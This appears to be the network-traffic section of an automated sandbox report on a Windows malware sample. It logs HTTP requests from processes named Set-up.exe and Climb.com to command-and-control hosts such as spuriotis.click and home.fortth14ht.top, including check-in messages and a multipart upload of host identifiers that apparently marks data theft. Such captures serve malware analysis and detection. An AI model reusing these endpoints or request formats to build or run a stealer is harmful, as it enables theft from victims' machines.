                                                                                                                                                                        1192.168.2.1249717194.87.58.92806744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:56:57.784992933 CET99OUTGET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Dec 28, 2024 09:56:59.185481071 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:56:58 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 207
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.1249720194.87.58.92806744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:56:59.649631977 CET172OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                        Dec 28, 2024 09:57:01.076814890 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:00 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 207
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.12497113.218.7.1034436744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:56:38 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                        Host: httpbin.org
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        2024-12-28 08:56:39 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:56:39 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Server: gunicorn/19.9.0
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                        2024-12-28 08:56:39 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.1249718104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:56:59 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:56:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-12-28 08:57:00 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:00 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=vl92ijf6dt03ur4t8nrpfe4uej; expires=Wed, 23 Apr 2025 02:43:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPHGSxIbaJA2Z%2FaPiEUiCNp9N7B%2FFAgH1ySC9%2FTS1aAp%2Fn9Cwy0I7hx8cssY630gkqNhGZgshOBqAIdl2UE3Tt25nB5zz%2BGFzns%2FcHYsEJFAh%2BGtoTVOuM2mopiahdXp4WU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f90571dfa2e7c94-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1901&rtt_var=715&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1527196&cwnd=240&unsent_bytes=0&cid=bf69a8040c4caef0&ts=869&x=0"
                                                                                                                                                                        2024-12-28 08:57:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-12-28 08:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.1249721104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:01 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 45
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:01 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
                                                                                                                                                                        2024-12-28 08:57:02 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:02 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=a52cj6l96gja0dqj8m19lulb22; expires=Wed, 23 Apr 2025 02:43:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rE65xvhqg8SdpOtyUy2jfbhZx%2BdtX8Vt%2Br3DYEkOwBnSkopq2BAWqF7dJV7sE%2F3cJ%2FLkR5AniYMHSXxv4qLSjJ59XRSAb7S%2BAJN5y8utjjPRljGqDR7yy%2BQxi3xJN8wMXmo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f90572b182643c8-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1688&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=944&delivery_rate=1729857&cwnd=192&unsent_bytes=0&cid=c783de6970375f62&ts=809&x=0"
                                                                                                                                                                        2024-12-28 08:57:02 UTC240INData Raw: 34 39 31 63 0d 0a 38 4b 61 6c 45 69 59 7a 4b 57 35 71 69 39 35 6a 48 2b 6d 7a 73 42 74 55 59 75 56 6b 4b 30 75 71 49 32 6e 70 59 44 52 30 6a 61 6d 4c 68 4e 4d 77 48 41 63 46 54 42 6e 75 2f 46 6c 72 6d 38 62 56 4e 33 59 44 67 55 59 52 4c 63 74 50 47 6f 78 4d 46 67 4c 67 69 38 72 41 78 48 35 56 56 67 56 4d 44 2f 50 38 57 55 53 53 6b 64 56 31 64 6c 6a 48 41 55 45 70 79 30 38 4c 69 41 74 62 42 4f 48 4b 6d 4d 72 43 65 6b 4e 51 54 51 38 47 35 72 73 47 65 6f 6a 5a 33 6e 49 35 43 6f 68 47 42 32 6e 50 57 55 76 54 51 6e 6b 52 2b 63 69 39 78 39 5a 35 42 45 34 46 46 55 6a 75 73 45 45 6c 79 39 4c 56 65 54 67 45 67 51 39 44 49 38 4a 48 43 6f 30 4b 52 42 33 72 77 5a 6a 45 77 58 74 4a 57 56 6b 43 44 4f 47 77 41 48 43 49 6b 5a
                                                                                                                                                                        Data Ascii: 491c8KalEiYzKW5qi95jH+mzsBtUYuVkK0uqI2npYDR0jamLhNMwHAcFTBnu/Flrm8bVN3YDgUYRLctPGoxMFgLgi8rAxH5VVgVMD/P8WUSSkdV1dljHAUEpy08LiAtbBOHKmMrCekNQTQ8G5rsGeojZ3nI5CohGB2nPWUvTQnkR+ci9x9Z5BE4FFUjusEEly9LVeTgEgQ9DI8JHCo0KRB3rwZjEwXtJWVkCDOGwAHCIkZ
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 77 35 4d 52 6a 48 58 67 6c 36 2b 6b 49 61 6d 68 64 62 42 75 6d 4c 6a 59 72 65 4d 45 4e 64 43 31 52 49 34 62 41 50 65 49 6a 65 31 58 67 32 45 6f 67 47 53 69 48 41 52 51 47 45 44 56 6b 59 35 63 79 61 7a 63 42 2f 51 31 6c 4e 41 77 75 70 38 6b 46 36 6b 35 47 4b 4f 52 59 51 68 41 56 64 4a 4e 6b 42 46 4d 55 62 46 68 48 6a 69 38 71 45 77 58 35 46 58 45 73 65 41 4f 4b 33 42 47 2b 41 32 4e 39 30 4e 67 32 4e 43 55 6f 70 7a 30 73 42 68 41 68 53 47 2b 4c 4e 6b 73 53 48 50 67 52 57 55 30 78 51 71 5a 38 45 62 59 7a 64 78 44 73 4d 51 4a 68 49 55 47 6e 50 54 55 76 54 51 6c 34 54 37 4d 69 5a 79 38 52 34 54 30 4e 4c 48 67 37 6b 75 52 4e 37 6a 74 2f 59 65 69 51 4b 69 51 42 4b 49 4d 4e 49 44 6f 77 47 46 6c 69 76 7a 49 71 45 6e 7a 42 6c 58 45 41 41 41 76 36 38 51 57 4c 46 79
                                                                                                                                                                        Data Ascii: w5MRjHXgl6+kIamhdbBumLjYreMENdC1RI4bAPeIje1Xg2EogGSiHARQGEDVkY5cyazcB/Q1lNAwup8kF6k5GKORYQhAVdJNkBFMUbFhHji8qEwX5FXEseAOK3BG+A2N90Ng2NCUopz0sBhAhSG+LNksSHPgRWU0xQqZ8EbYzdxDsMQJhIUGnPTUvTQl4T7MiZy8R4T0NLHg7kuRN7jt/YeiQKiQBKIMNIDowGFlivzIqEnzBlXEAAAv68QWLFy
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 4d 6a 51 42 47 4a 4d 51 42 52 63 73 46 54 6c 61 33 69 37 6a 48 30 33 4e 4f 45 33 34 50 42 75 65 37 46 7a 32 55 6e 38 73 35 4d 51 7a 48 58 67 6b 6b 79 55 6b 4e 6d 51 31 62 46 65 48 46 6e 63 48 49 65 45 52 52 52 67 6b 4d 34 72 63 43 63 49 2f 44 32 48 6b 2b 42 59 59 4d 51 32 6d 47 41 51 79 54 51 67 35 57 33 74 79 5a 68 76 4a 7a 53 6c 39 4d 47 6b 6a 32 38 68 67 39 6a 4e 32 53 49 58 59 4e 6a 77 4e 4d 4a 73 6c 4c 42 59 34 49 57 68 37 68 79 49 44 4c 77 33 42 49 57 55 45 42 42 75 32 30 43 48 61 41 31 39 4a 34 50 45 44 4a 52 6b 34 78 69 42 6c 4c 76 77 56 61 47 2b 43 4a 70 38 66 4a 66 6b 4e 48 43 78 4e 47 38 50 77 47 63 63 75 4a 6b 6e 55 2f 41 49 77 4d 54 53 6e 50 54 41 36 49 42 56 55 62 36 4d 47 63 77 38 4e 38 54 56 78 4e 44 41 2f 74 75 52 4e 34 67 74 33 65 4f 58
                                                                                                                                                                        Data Ascii: MjQBGJMQBRcsFTla3i7jH03NOE34PBue7Fz2Un8s5MQzHXgkkyUkNmQ1bFeHFncHIeERRRgkM4rcCcI/D2Hk+BYYMQ2mGAQyTQg5W3tyZhvJzSl9MGkj28hg9jN2SIXYNjwNMJslLBY4IWh7hyIDLw3BIWUEBBu20CHaA19J4PEDJRk4xiBlLvwVaG+CJp8fJfkNHCxNG8PwGccuJknU/AIwMTSnPTA6IBVUb6MGcw8N8TVxNDA/tuRN4gt3eOX
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 56 6d 66 52 41 51 79 48 51 67 35 57 35 73 4b 41 79 73 6c 35 53 56 64 44 43 77 62 6b 74 77 64 32 6a 4e 62 55 64 44 34 4e 67 67 56 49 4c 63 4a 54 43 49 41 49 57 78 79 76 68 64 4c 44 33 7a 41 63 45 57 77 41 49 66 6d 6e 45 32 76 4c 7a 70 78 67 64 67 65 4c 52 68 46 70 79 30 34 43 68 41 70 65 47 65 44 50 6e 4d 4c 42 66 55 46 65 51 52 34 41 35 37 45 4b 63 6f 44 44 30 6e 51 79 44 49 4d 4f 51 69 4f 49 44 30 75 4d 47 68 5a 4f 72 2f 36 66 79 38 64 7a 55 68 46 55 51 68 47 70 75 77 30 39 30 35 48 65 64 7a 59 50 69 77 70 43 49 63 6c 4e 42 59 77 48 58 78 37 6e 32 5a 50 41 7a 33 46 4b 58 6b 6f 49 44 65 79 34 42 6e 6d 4e 33 70 49 33 64 67 65 66 52 68 46 70 35 32 59 2b 79 53 4e 73 56 76 43 46 69 34 54 41 66 41 51 4a 43 77 41 4c 35 62 51 4f 65 34 4c 64 32 48 41 39 44 49 77
                                                                                                                                                                        Data Ascii: VmfRAQyHQg5W5sKAysl5SVdDCwbktwd2jNbUdD4NggVILcJTCIAIWxyvhdLD3zAcEWwAIfmnE2vLzpxgdgeLRhFpy04ChApeGeDPnMLBfUFeQR4A57EKcoDD0nQyDIMOQiOID0uMGhZOr/6fy8dzUhFUQhGpuw0905HedzYPiwpCIclNBYwHXx7n2ZPAz3FKXkoIDey4BnmN3pI3dgefRhFp52Y+ySNsVvCFi4TAfAQJCwAL5bQOe4Ld2HA9DIw
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 45 51 45 69 67 4e 51 42 4f 6a 43 67 4d 72 4b 66 30 78 5a 51 67 30 4d 37 4c 45 48 63 59 48 51 31 58 63 34 43 4d 64 49 43 53 37 51 41 56 50 4c 49 30 59 4e 2f 64 32 66 35 63 70 2f 42 45 34 46 46 55 6a 75 73 45 45 6c 79 39 6a 41 66 54 73 53 6a 67 46 48 4a 73 74 54 43 6f 59 4a 52 42 48 67 7a 35 58 49 77 58 39 43 55 45 34 47 42 4f 36 35 43 6e 4b 48 6b 5a 77 35 4d 52 6a 48 58 67 6b 48 77 31 49 63 69 41 78 64 41 50 53 4c 6a 59 72 65 4d 45 4e 64 43 31 52 49 36 72 63 4b 65 59 76 64 30 6e 30 37 41 4a 55 4a 54 69 37 42 53 68 6d 42 42 56 45 64 35 38 43 64 77 74 56 38 53 6b 4e 4f 48 68 71 70 38 6b 46 36 6b 35 47 4b 4f 51 41 48 6c 78 5a 4b 61 2f 6c 58 43 4a 30 4a 57 78 71 76 31 4e 7a 64 68 33 64 49 45 52 4e 4d 44 75 61 31 41 6e 4b 4b 32 4e 35 30 4d 77 6d 43 42 30 38 74
                                                                                                                                                                        Data Ascii: EQEigNQBOjCgMrKf0xZQg0M7LEHcYHQ1Xc4CMdICS7QAVPLI0YN/d2f5cp/BE4FFUjusEEly9jAfTsSjgFHJstTCoYJRBHgz5XIwX9CUE4GBO65CnKHkZw5MRjHXgkHw1IciAxdAPSLjYreMENdC1RI6rcKeYvd0n07AJUJTi7BShmBBVEd58CdwtV8SkNOHhqp8kF6k5GKOQAHlxZKa/lXCJ0JWxqv1Nzdh3dIERNMDua1AnKK2N50MwmCB08t
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 67 5a 46 67 6d 68 30 74 4c 44 79 7a 41 63 45 55 67 4c 43 2b 69 32 43 48 47 45 31 74 5a 72 50 41 65 56 42 30 67 69 78 55 30 4c 68 67 39 63 46 2b 62 47 6e 73 6e 41 64 30 74 55 43 30 4a 49 37 71 52 42 4a 63 76 77 33 33 49 36 57 39 31 47 56 6d 66 52 41 51 79 48 51 67 35 57 37 38 47 58 7a 73 70 7a 53 31 4a 5a 44 51 37 37 76 41 78 33 6d 64 76 5a 66 44 73 4e 69 67 56 50 4c 38 4e 4e 47 59 49 43 56 52 32 76 68 64 4c 44 33 7a 41 63 45 57 67 62 48 75 4f 37 44 57 75 41 30 4e 46 76 4f 78 44 48 53 41 6b 34 7a 31 42 4c 30 78 52 47 41 65 6a 55 33 4e 32 48 64 30 67 52 45 30 77 4f 34 4c 6f 47 65 34 58 44 31 33 38 35 44 34 34 50 54 53 48 4c 51 51 2b 50 42 56 4d 56 34 38 43 56 78 38 68 30 54 56 39 43 41 30 69 6e 2f 41 5a 6c 79 34 6d 53 57 43 30 44 69 77 73 4a 4e 6f 5a 59 53
                                                                                                                                                                        Data Ascii: gZFgmh0tLDyzAcEUgLC+i2CHGE1tZrPAeVB0gixU0Lhg9cF+bGnsnAd0tUC0JI7qRBJcvw33I6W91GVmfRAQyHQg5W78GXzspzS1JZDQ77vAx3mdvZfDsNigVPL8NNGYICVR2vhdLD3zAcEWgbHuO7DWuA0NFvOxDHSAk4z1BL0xRGAejU3N2Hd0gRE0wO4LoGe4XD1385D44PTSHLQQ+PBVMV48CVx8h0TV9CA0in/AZly4mSWC0DiwsJNoZYS
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 52 39 34 76 4b 68 4f 64 37 55 6c 52 4d 47 6b 72 63 76 77 39 7a 6a 4d 65 53 5a 67 6c 4f 78 77 6c 54 61 5a 42 34 45 73 73 46 57 6c 61 33 69 34 66 44 78 33 64 65 52 30 77 41 47 65 4b 78 44 56 2b 45 31 73 52 36 4f 51 4f 57 44 77 55 69 78 51 46 46 79 77 56 4f 56 72 65 4c 76 63 50 52 63 32 74 53 57 67 56 49 70 2f 77 47 61 38 75 4a 6b 6b 64 32 45 6f 51 57 53 69 62 5a 66 30 76 54 47 32 68 57 35 4e 32 56 31 4d 52 6d 54 31 78 48 48 54 61 70 35 46 55 76 32 59 4f 41 4b 79 6c 41 6d 44 6b 48 61 63 6b 42 55 37 49 62 46 67 43 76 6b 38 43 4b 68 32 49 45 43 51 74 4c 43 2f 75 75 42 33 36 64 30 70 56 48 43 43 65 52 44 45 34 35 7a 31 59 45 79 30 77 57 47 61 2b 54 71 34 54 4f 64 31 39 41 58 51 45 59 37 76 77 2b 4d 38 76 4a 6b 69 46 32 4e 59 51 49 52 79 37 65 55 45 61 73 46 46
                                                                                                                                                                        Data Ascii: R94vKhOd7UlRMGkrcvw9zjMeSZglOxwlTaZB4EssFWla3i4fDx3deR0wAGeKxDV+E1sR6OQOWDwUixQFFywVOVreLvcPRc2tSWgVIp/wGa8uJkkd2EoQWSibZf0vTG2hW5N2V1MRmT1xHHTap5FUv2YOAKylAmDkHackBU7IbFgCvk8CKh2IECQtLC/uuB36d0pVHCCeRDE45z1YEy0wWGa+Tq4TOd19AXQEY7vw+M8vJkiF2NYQIRy7eUEasFF
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 72 4d 58 4b 66 77 68 66 51 41 77 50 2b 61 6f 61 4d 59 50 53 79 47 4d 49 50 71 77 4b 54 79 37 53 52 67 32 74 49 68 5a 59 72 38 54 53 6e 50 34 77 44 42 46 30 51 6b 6a 78 2f 46 6b 39 76 74 4c 63 64 7a 45 57 6c 6b 74 68 43 76 4a 37 53 61 63 46 51 31 54 62 7a 49 4c 56 7a 48 31 49 45 51 56 4d 44 71 6e 6b 55 54 50 4c 31 63 4d 35 62 6c 44 56 58 52 78 36 6e 78 46 5a 6c 45 78 50 56 76 6d 4c 79 70 61 4a 4d 46 59 52 45 30 78 50 36 71 34 54 65 34 6a 48 30 54 34 49 50 71 41 49 54 69 6a 65 55 52 79 45 50 47 67 44 37 4d 57 63 77 39 46 68 42 42 38 4c 41 30 69 78 68 55 45 31 79 2b 36 63 4f 53 35 41 33 30 5a 38 4b 73 5a 50 44 4a 30 54 47 7a 48 68 7a 4a 50 53 31 32 64 4c 45 51 56 4d 44 71 6e 6b 55 7a 50 4c 31 63 4d 35 62 6c 44 56 58 52 78 36 6e 78 46 5a 6c 45 78 50 56 76 6d
                                                                                                                                                                        Data Ascii: rMXKfwhfQAwP+aoaMYPSyGMIPqwKTy7SRg2tIhZYr8TSnP4wDBF0Qkjx/Fk9vtLcdzEWlkthCvJ7SacFQ1TbzILVzH1IEQVMDqnkUTPL1cM5blDVXRx6nxFZlExPVvmLypaJMFYRE0xP6q4Te4jH0T4IPqAITijeURyEPGgD7MWcw9FhBB8LA0ixhUE1y+6cOS5A30Z8KsZPDJ0TGzHhzJPS12dLEQVMDqnkUzPL1cM5blDVXRx6nxFZlExPVvm
                                                                                                                                                                        2024-12-28 08:57:02 UTC1369INData Raw: 33 31 4c 56 67 6b 73 44 2f 2b 2f 51 54 50 4c 33 5a 49 68 64 67 47 4e 46 6b 51 6d 7a 77 30 4d 6b 51 55 57 57 4b 2f 46 30 70 79 48 63 55 35 42 52 67 4d 50 70 62 6f 50 63 38 76 4f 6e 47 42 32 46 73 64 65 47 6d 65 49 55 30 76 54 51 68 45 56 2f 64 6d 55 78 39 46 7a 41 32 39 31 49 52 72 75 72 41 49 2f 75 74 7a 57 62 79 4d 44 6c 77 46 33 46 2b 56 54 44 4a 73 42 46 43 66 35 79 4a 4c 4b 77 44 41 4b 45 56 4e 4d 55 4b 6d 52 45 33 71 62 30 70 49 33 64 67 7a 48 58 67 6b 6b 32 6b 59 62 69 45 35 52 44 4f 69 4c 6a 59 72 65 4d 46 49 52 45 31 39 47 71 61 35 42 4a 63 75 57 33 48 51 33 41 34 6b 46 57 7a 76 4f 51 68 32 49 52 57 67 6f 77 74 6d 56 31 4d 51 79 64 56 78 50 47 68 33 71 72 41 5a 44 74 66 7a 41 66 69 59 44 78 53 70 4f 4a 4d 52 2f 4e 62 77 54 55 51 61 74 37 5a 48 53
                                                                                                                                                                        Data Ascii: 31LVgksD/+/QTPL3ZIhdgGNFkQmzw0MkQUWWK/F0pyHcU5BRgMPpboPc8vOnGB2FsdeGmeIU0vTQhEV/dmUx9FzA291IRrurAI/utzWbyMDlwF3F+VTDJsBFCf5yJLKwDAKEVNMUKmRE3qb0pI3dgzHXgkk2kYbiE5RDOiLjYreMFIRE19Gqa5BJcuW3HQ3A4kFWzvOQh2IRWgowtmV1MQydVxPGh3qrAZDtfzAfiYDxSpOJMR/NbwTUQat7ZHS


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.1249722104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:04 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=W4VT9U8C13
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 12787
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:04 UTC12787OUTData Raw: 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                        Data Ascii: --W4VT9U8C13Content-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--W4VT9U8C13Content-Disposition: form-data; name="pid"2--W4VT9U8C13Content-Disposition: form-data; name="lid"5FwhVM--lll--W4VT9U8C13Content-Di
                                                                                                                                                                        2024-12-28 08:57:04 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:04 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=meb6hsho7fqsj4e4joefu09t4n; expires=Wed, 23 Apr 2025 02:43:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
